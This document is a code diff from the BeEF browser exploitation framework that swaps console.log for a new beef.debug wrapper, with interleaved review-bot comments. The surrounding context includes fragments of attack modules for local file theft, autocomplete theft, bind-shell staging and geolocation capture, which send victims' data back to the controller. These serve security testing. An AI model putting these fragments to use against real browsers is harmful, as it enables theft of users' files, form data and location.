diff --git a/core/main/client/beef.js b/core/main/client/beef.js index 1bbcc01c9..14f39e2a0 100644 --- a/core/main/client/beef.js +++ b/core/main/client/beef.js @@ -31,7 +31,20 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') { // An array containing all the BeEF JS components. components: new Array(), - + + /** + * Adds a function to display debug messages (wraps console.log()) + * @param: {string} the debug string to return + */ + debug: function(msg) { + if (typeof console == "object" && typeof console.log == "function") { + console.log(msg); + } else { + // TODO: maybe add a callback to BeEF server for debugging purposes + //window.alert(msg); + } + }, + /** * Adds a function to execute. * @param: {Function} the function to execute. diff --git a/core/main/client/browser.js b/core/main/client/browser.js index edded787e..ed83764ca 100644 --- a/core/main/client/browser.js +++ b/core/main/client/browser.js @@ -871,10 +871,10 @@ beef.browser = { try { // append hook script self.frames[i].document.body.appendChild(script); - //console.log("Hooked child frame [src:"+self.frames[i].window.location.href+"]"); + //beef.debug("Hooked child frame [src:"+self.frames[i].window.location.href+"]"); } catch (e) { // warn on cross-domain - //console.log("Hooking frame failed"); + //beef.debug("Hooking frame failed"); } } }, diff --git a/core/main/client/geolocation.js b/core/main/client/geolocation.js index aa50adaed..3347bdbc2 100644 --- a/core/main/client/geolocation.js +++ b/core/main/client/geolocation.js 
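Review bot: The new `beef.debug` in core/main/client/beef.js accepts a single `msg` and passes only that to `console.log`, so extra arguments are dropped. The printf-style call sites this commit renames in geolocation.js are currently commented out, e.g. `beef.debug("... latitude [%d], longitude [%d]", latitude, longitude)`, and would lose their values once enabled. Forwarding everything with `console.log.apply(console, arguments);` keeps the behaviour of the calls it replaces. The JSDoc is also inaccurate: the function returns nothing, and the tag should read `@param {string} msg - the message to write to the browser console`. The enclosing `beef` object literal starts and ends outside the hunk.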
@@ -32,14 +32,14 @@ beef.geolocation = { $j.ajax({ error: function(xhr, status, error){ - //console.log("[geolocation.js] openstreetmap error"); + //beef.debug("[geolocation.js] openstreetmap error"); beef.net.send(command_url, command_id, "latitude=" + latitude + "&longitude=" + longitude + "&osm=UNAVAILABLE" + "&geoLocEnabled=True"); }, success: function(data, status, xhr){ - //console.log("[geolocation.js] openstreetmap success"); + //beef.debug("[geolocation.js] openstreetmap success"); var jsonResp = $j.parseJSON(data); beef.net.send(command_url, command_id, "latitude=" + latitude @@ -64,16 +64,16 @@ beef.geolocation = { beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False"); return; } - //console.log("[geolocation.js] navigator.geolocation.getCurrentPosition"); + //beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition"); navigator.geolocation.getCurrentPosition( //note: this is an async call function(position){ // success var latitude = position.coords.latitude; var longitude = position.coords.longitude; - //console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude); + //beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude); beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude); }, function(error){ // failure - //console.log("[geolocation.js] error [%d] getting position", error.code); + //beef.debug("[geolocation.js] error [%d] getting position", error.code); switch(error.code) // Returns 0-3 { case 0: diff --git a/core/main/client/init.js b/core/main/client/init.js index b18fd262a..1a7780798 100644 --- a/core/main/client/init.js +++ b/core/main/client/init.js 
@@ -32,7 +32,7 @@ window.onpopstate = function (event) { try { callback(event); } catch (e) { - console.log("window.onpopstate - couldn't execute callback: " + e.message); + beef.debug("window.onpopstate - couldn't execute callback: " + e.message); } return false; } @@ -47,7 +47,7 @@ window.onclose = function (event) { try { callback(event); } catch (e) { - console.log("window.onclose - couldn't execute callback: " + e.message); + beef.debug("window.onclose - couldn't execute callback: " + e.message); } return false; } diff --git a/core/main/client/net/dns.js b/core/main/client/net/dns.js index 3da10bf36..7955198c2 100644 --- a/core/main/client/net/dns.js +++ b/core/main/client/net/dns.js @@ -43,7 +43,7 @@ beef.net.dns = { // sends a DNS request sendQuery = function(query) { - //console.log("Requesting: "+query); + //beef.debug("Requesting: "+query); var img = new Image; img.src = "http://"+query; img.onload = function() { dom.removeChild(this); } diff --git a/core/main/client/net/xssrays.js b/core/main/client/net/xssrays.js index d6914fe00..85e4eb722 100644 --- a/core/main/client/net/xssrays.js +++ b/core/main/client/net/xssrays.js @@ -105,7 +105,7 @@ beef.net.xssrays = { // util function. Print string to the console only if the debug flag is on and the browser is not IE. printDebug:function(log) { if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) { - console.log("[XssRays] " + log); + beef.debug("[XssRays] " + log); } }, diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js index bbc7c5f36..1b95fbc97 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js 
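Review bot: In xssrays.js, `printDebug` still tests `!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8()` before calling `beef.debug`, although the wrapper added in beef.js by this commit already checks that `console.log` is available. The browser checks look redundant now and could be reduced to `if (this.debug) { beef.debug("[XssRays] " + log); }`, with the comment above the function updated to match. Confirm first that nothing else relies on the IE exclusion.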
@@ -33,7 +33,7 @@ ZombieTab_IpecTab = function(zombie) { id = data.id; }, error: function(){ - console.log("Error getting module id."); + beef.debug("Error getting module id."); } }); return id; @@ -110,11 +110,11 @@ ZombieTab_IpecTab = function(zombie) { async: false, processData: false, success: function(data){ - console.log("data: " + data.command_id); + beef.debug("data: " + data.command_id); result = "Command [" + data.command_id + "] sent successfully"; }, error: function(){ - console.log("Error sending command"); + beef.debug("Error sending command"); return "Error sending command"; } }); @@ -142,13 +142,13 @@ ZombieTab_IpecTab = function(zombie) { processData: false, success: function(data){ $jwterm.each(data, function(i){ - console.log("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data); + beef.debug("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data); results += $jwterm.parseJSON(data[i].data).data; }); }, error: function(){ - console.log("Error sending command"); + beef.debug("Error sending command"); return "Error sending command"; } }); diff --git a/modules/debug/test_beef_debug/command.js b/modules/debug/test_beef_debug/command.js new file mode 100644 index 000000000..4737ae211 --- /dev/null +++ b/modules/debug/test_beef_debug/command.js @@ -0,0 +1,17 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + try { + var msg = "<%= @msg.gsub(/"/, '\\"') %>"; + beef.debug(msg); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=called the beef.debug() function. Check the developer console for your debug message.'); + } catch(e) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=something went wrong&error='+e.message); + } + +}); 
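Review bot: The calls in ZombieTabIpec.js now depend on a global `beef` object, but this file belongs to the admin UI (extensions/admin_ui) while `beef.debug` is defined in the client hook (core/main/client/beef.js). Nothing in the hunks shows the hook script being loaded on the panel page. If it is not, `beef.debug("data: " + data.command_id)` in the success callback throws a ReferenceError before `result` is assigned, and the same applies to the hunks at -33 and -142. Either keep `console.log` in the admin UI or guard the call, e.g. `if (window.beef && beef.debug) { beef.debug("Error getting module id."); }`. The callbacks' enclosing functions start outside the hunks.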
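Review bot: In modules/debug/test_beef_debug/command.js the template escapes only double quotes (`@msg.gsub(/"/, '\\"')`), so a backslash or a line break in the message is emitted raw into the JavaScript string literal. module.rb declares the option as a `textarea`, so multi-line input is expected; it would make the script fail to parse, which the `try`/`catch` cannot report. A trailing backslash would likewise escape the closing quote. Encoding the whole value on the server side, for example `var msg = <%= @msg.to_json %>;` (assuming the JSON library is available to the template), covers quotes, backslashes and newlines in one step.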
diff --git a/modules/debug/test_beef_debug/config.yaml b/modules/debug/test_beef_debug/config.yaml
new file mode 100644
index 000000000..f077e3b4f
--- /dev/null
+++ b/modules/debug/test_beef_debug/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ test_beef_debug:
+ enable: true
+ category: "Debug"
+ name: "Test beef.debug()"
+ description: "Test the 'beef.debug()' function. This function wraps 'console.log()'"
+ authors: ["bcoles"]
+ target:
+ working: ["All"]
+ not_working: ["IE"]
diff --git a/modules/debug/test_beef_debug/module.rb b/modules/debug/test_beef_debug/module.rb
new file mode 100644
index 000000000..239272875
--- /dev/null
+++ b/modules/debug/test_beef_debug/module.rb
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Test_beef_debug < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'msg', 'description' => 'Debug Message', 'ui_label' => 'Debug Message', 'value' => "Test string for beef.debug() function", 'type' => 'textarea', 'width' => '400px', 'height' => '50px' }
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['Result'] = @datastore['result']
+ save content
+ end
+
+end
diff --git a/modules/exploits/beefbind/beef_bind_shell/command.js b/modules/exploits/beefbind/beef_bind_shell/command.js
index dbd0df5ca..da6d040f0 100755
--- a/modules/exploits/beefbind/beef_bind_shell/command.js
+++ b/modules/exploits/beefbind/beef_bind_shell/command.js
@@ -31,15 +31,15 @@ beef.execute(function () { xhr.onreadystatechange = function(){ if(xhr.readyState == 4){ var result = strip_output(xhr.responseText); - console.log("result.length: " + result.length); + beef.debug("result.length: " + result.length); if(result.length != 0){ - console.log("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result); + beef.debug("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result); beef.net.send("<%= @command_url %>", <%= @command_id %>, result); counter++; setTimeout("get_additional_cmd_results()",500); } }else{ // No more command results, ready to send another command. - console.log("get_additional_cmd_results - readyState != 4: request [" + counter + "]"); + beef.debug("get_additional_cmd_results - readyState != 4: request [" + counter + "]"); } }; xhr.open("GET", uri, false); @@ -51,9 +51,9 @@ beef.execute(function () { xhr = new XMLHttpRequest(); xhr.onreadystatechange = function(){ if(xhr.readyState == 4){ - console.log("get_prompt: Retrieved prompt"); + beef.debug("get_prompt: Retrieved prompt"); var prompt = strip_output(xhr.responseText); - console.log(prompt); + beef.debug(prompt); beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt); //send command @@ -68,7 +68,7 @@ beef.execute(function () { xhr = new XMLHttpRequest(); xhr.onreadystatechange = function(){ var cmd_result = strip_output(xhr.responseText); - console.log(cmd_result); + beef.debug(cmd_result); beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result); }; xhr.open("POST", uri, false); diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/command.js b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js index c0f65089b..dff727eb9 100755 --- a/modules/exploits/beefbind/beef_bind_staged_deploy/command.js +++ b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js 
@@ -295,7 +295,7 @@ beef.execute(function () { // this is required only with WebKit browsers. if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { - console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary."); + beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary."); XMLHttpRequest.prototype.sendAsBinary = function(datastr) { function byteValue(x) { return x.charCodeAt(0) & 0xff; @@ -310,7 +310,7 @@ beef.execute(function () { log("send_stager: stager sent."); stager_successfull = true; }catch(exception){ - console.log("!!! Exception: " + exception); + beef.debug("!!! Exception: " + exception); // Check for PortBanning exceptions: //NS_ERROR_PORT_ACCESS_NOT_ALLOWED: Establishing a connection to an unsafe or otherwise banned port was prohibited if(exception.toString().indexOf('NS_ERROR_PORT_ACCESS_NOT_ALLOWED') != -1){ @@ -335,13 +335,13 @@ beef.execute(function () { var uri = "http://" + rhost + ":" + rport + path; xhr = new XMLHttpRequest(); - console.log("uri: " + uri); + beef.debug("uri: " + uri); xhr.open("POST", uri, true); xhr.setRequestHeader("Content-Type", "text/plain"); // this is required only with WebKit browsers. if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) { - console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary."); + beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary."); XMLHttpRequest.prototype.sendAsBinary = function(datastr) { function byteValue(x) { return x.charCodeAt(0) & 0xff; @@ -362,7 +362,7 @@ beef.execute(function () { log = function(data){ beef.net.send("<%= @command_url %>", <%= @command_id %>, data); - console.log(data); + beef.debug(data); }; diff --git a/modules/misc/local_file_theft/command.js b/modules/misc/local_file_theft/command.js index 1cff957ef..d0cd40942 100644 --- a/modules/misc/local_file_theft/command.js +++ b/modules/misc/local_file_theft/command.js 
@@ -219,9 +219,9 @@ result = ''; function grabFiles(dir,os){ tmpfile = {} for (i in fileList[os]['post']){ - console.log('dir = ' + dir); - console.log('fileList: ' + fileList[os]['post'][i]); - console.log(i); + beef.debug('dir = ' + dir); + beef.debug('fileList: ' + fileList[os]['post'][i]); + beef.debug(i); tmpfile[i] = new XMLHttpRequest() tmpfile[i].open ('get',dir+"/"+fileList[os]['post'][i]); tmpfile[i].send(); @@ -229,7 +229,7 @@ result = ''; tmpfile[i].onreadystatechange=function(){ for (j in fileList[os]['post']){ if(tmpfile[j].readyState==4){ - console.log('new returned for: ' + j); + beef.debug('new returned for: ' + j); result = j +": "+ tmpfile[j].responseText; beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result); diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js index 620defb23..476041a55 100644 --- a/modules/network/internal_network_fingerprinting/command.js +++ b/modules/network/internal_network_fingerprinting/command.js @@ -219,7 +219,7 @@ beef.execute(function() { for(var u=0; u < urls.length; u++) { if(!urls[u][3] && ports != null){ // use default port var img = new Image; - //console.log("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "]"); + //beef.debug("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "]"); img.id = u; img.src = urls[u][2]+"://"+ips[i]+":"+urls[u][1]+urls[u][4]; img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } } @@ -227,7 +227,7 @@ beef.execute(function() { } else { // iterate to all the specified ports for(p=0;p', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } } 
diff --git a/modules/phonegap/phonegap_geo_locate/command.js b/modules/phonegap/phonegap_geo_locate/command.js index c34389780..99f0ef075 100644 --- a/modules/phonegap/phonegap_geo_locate/command.js +++ b/modules/phonegap/phonegap_geo_locate/command.js @@ -27,7 +27,7 @@ beef.execute(function() { // onError Callback receives a PositionError object // function onError(error) { - console.log('code: ' + error.code + '\n' + + beef.debug('code: ' + error.code + '\n' + 'message: ' + error.message + '\n'); } diff --git a/modules/phonegap/phonegap_persistence/command.js b/modules/phonegap/phonegap_persistence/command.js index df520a17d..d15797a72 100644 --- a/modules/phonegap/phonegap_persistence/command.js +++ b/modules/phonegap/phonegap_persistence/command.js @@ -26,12 +26,12 @@ beef.execute(function() { function write_file(text) { function fail () { - console.log('write_file fail') + beef.debug('write_file fail') } function gotFileWriter(writer) { writer.onwrite = function(evt) { - console.log("write success"); + beef.debug("write success"); } writer.write(text); } @@ -59,14 +59,14 @@ beef.execute(function() { function read_index(app_name) { function fail () { - console.log('read_index fail') + beef.debug('read_index fail') } function readFile(file) { var reader = new FileReader(); reader.onloadend = function(evt) { - //console.log("Read as text"); - console.log(evt.target.result); + //beef.debug("Read as text"); + beef.debug(evt.target.result); replace_text(evt.target.result); }; reader.readAsText(file); @@ -86,14 +86,14 @@ beef.execute(function() { function locate() { function result(entries) { - console.log('result'); + beef.debug('result'); var i; for (i=0; i.app var re = new RegExp(/^[a-zA-Z0-9]*\.app/) var match = re.exec(entries[i].name) if (match) { - console.log('found ' + entries[i].name); + beef.debug('found ' + entries[i].name); // look for ../.app/www/index.html read_index(entries[i].name); 
@@ -107,11 +107,11 @@ beef.execute(function() { function fail() { - console.log('fail'); + beef.debug('fail'); } function win(entries) { - console.log('win'); + beef.debug('win'); result(entries); } diff --git a/modules/social_engineering/autocomplete_theft/command.js b/modules/social_engineering/autocomplete_theft/command.js index ffcb1677c..d8b9ae639 100644 --- a/modules/social_engineering/autocomplete_theft/command.js +++ b/modules/social_engineering/autocomplete_theft/command.js @@ -44,7 +44,7 @@ beef.execute(function() { var val = JSON.stringify({'input':n,'value':v}); if (v != "" && !inArray(val,results)){ results.push(val); - //console.log(val); + //beef.debug(val); beef.net.send('<%= @command_url %>', <%= @command_id %>, "results="+val); } } diff --git a/modules/social_engineering/clippy/command.js b/modules/social_engineering/clippy/command.js index 7d1878e32..1e635fbbc 100755 --- a/modules/social_engineering/clippy/command.js +++ b/modules/social_engineering/clippy/command.js @@ -291,7 +291,7 @@ Clippy.prototype.findHomeBase = function(selector) { } - console.log(ref); + beef.debug(ref); return ref; }